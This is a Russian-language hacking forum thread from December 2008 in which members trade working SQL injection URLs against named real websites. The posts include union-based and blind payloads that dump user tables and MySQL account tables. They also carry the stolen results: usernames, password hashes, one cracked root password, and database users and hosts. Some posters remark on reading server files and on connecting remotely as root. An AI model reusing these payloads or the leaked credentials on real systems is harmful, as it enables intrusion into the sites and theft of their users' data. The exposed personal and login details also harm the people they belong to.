17.12.2008, 00:06
|
|
Познающий
Регистрация: 12.12.2008
Сообщений: 31
Провел на форуме:
141806
Репутация:
68
|
|
Пока я тут, активность в данном разделе будет.
Код:
http://www.memfis.eu/ko7e7a/users.php?id=-32+union+select+1,aes_decrypt(aes_encrypt(convert(concat(id,0x3a,nick,0x3a,name,0x3a,email,0x3a,website),binary),0x71),0x71),3,4,5,6,7+from+users+limit+0,1--
|
|
|
17.12.2008, 00:13
|
|
Познающий
Регистрация: 12.12.2008
Сообщений: 31
Провел на форуме:
141806
Репутация:
68
|
|
cpdvd.ru
Код:
http://www.cpdvd.ru/catalog.php?id=-4203+union+select+1,2,convert(concat(userid,0x3a,pass,0x3a,nam,0x3a,fam,0x3a,tel),%20binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+users+limit+0,1/*
Счастье для пранкера, столько паролей от юзеров, которые ещё и телефоны мобильные оставляют.
Ловите more 1 row sql inj jir.it
Код:
http://www.jir.it/main.php?langid=2+and+if(ascii(lower(substring((select+concat(userid,0x3a,username,0x3a,passwd)+from+administration+limit+0,1),1,1)))%3C255,(select%201%20from%20administration),567)=1/*
administrator:dc8df5c2eecdb245ead108cfb7352f8b
расшифровать хеш не удалось к сожалению.
|
|
|
|
17.12.2008, 16:41
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
http://www.crmchealth.org/thefoundation/news.php?id=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database())/*
version: 5.0.30-Debian_1-log
user: mma@localhost
database: crmc
|
|
|
|
17.12.2008, 22:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
слепая(Subquery returns more than 1 row)
Код:
http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring((select%20concat(version(),char(58),user())),1,1))>=1,(select%201%20union%20select%202%20),0)--
4.0.27-max-log:irentedit@68.178.232.59
pr=4 |
|
|
|
17.12.2008, 22:37
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от The matrix
слепая(Subquery returns more than 1 row)
Код:
http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring((select%20concat(version(),char(58),user())),1,1))>=1,(select%201%20union%20select%202%20),0)--
4.0.27-max-log:irentedit@68.178.232.59
pr=4 Угу . слепая, из 19 полей 17 выводится 
http://www.nightnday.org/detail.php?list_id=-1573+union+select+1,2,3,4,5,concat_ws(0x3a,User(), Database(),Version()),7,8,9,0,11,12,13,14,15,16,17 ,18,19/*
И ветка пятая, а не четвёртая
atom_nightnday@localhost:nightnday:5.0.22
|
|
|
|
18.12.2008, 01:40
|
|
Новичок
Регистрация: 13.12.2008
Сообщений: 7
Провел на форуме:
142595
Репутация:
25
|
|
http://citycarclub.us/news.php?id_news=-1+union+select+1,2,concat(version(),char(58),user( ),char(58),database()),4/*
4.0.20-log:wwwadmin@localhost:ccc_en
Есть доступ к mysql.user
http://citycarclub.us/news.php?id_news=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t(user,char(58),password),0x71),0x71)+from+mysql.u ser+limit+0,1/*
|
|
|
|
18.12.2008, 17:39
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
http://felinewww.com/report.php?id=-877+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
4.1.22-standard
PR 4 |
|
|
|
18.12.2008, 23:42
|
|
Новичок
Регистрация: 13.12.2008
Сообщений: 7
Провел на форуме:
142595
Репутация:
25
|
|
http://www.audi.co.at/news.php?newsid=-631+union+select+1,2,3,concat(version(),char(58),u ser(),char(58),database()),5,6,7,8,9,10,11,12,13,1 4
4.0.18-log:audiat@amelie.szg.porsche.co.at:audiatdb
|
|
|
|
19.12.2008, 02:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
maxygen.com
PR 6
Код:
http://maxygen.com/newsview.php?listid=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user,0x3a,password,0x3a3a3a,host),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*
Код:
root:55755cfc38918d75:::localhost
Код:
root:55755cfc38918d75:::93763-app1.www.desantisbreindel.com
55755cfc38918d75: Brein950
p.s Как видно можно подрубиться удаленно под рутом к бд. Сам не пробовал...
В общем ловите Халявку
Последний раз редактировалось The matrix; 19.12.2008 в 09:39..
|
|
|
|
19.12.2008, 04:22
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
The matrix
Не все так просто. Этой скуле уже год где то наверное) и никто дальше не продвинулся) .. подключится удаленно нельзя там. А дир под запись доступных нет.
Кроме того там есть php инклюдинг совершенно простой, и читать все файлы на серваке можно, но ничего с этим не сделаешь(( Даже в админку нельзя зайти, пароль и пасс почему то не подходит(( видимо с определнного ip только можно.. хотя хз..
--skipped--
Последний раз редактировалось попугай; 21.12.2008 в 03:31..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
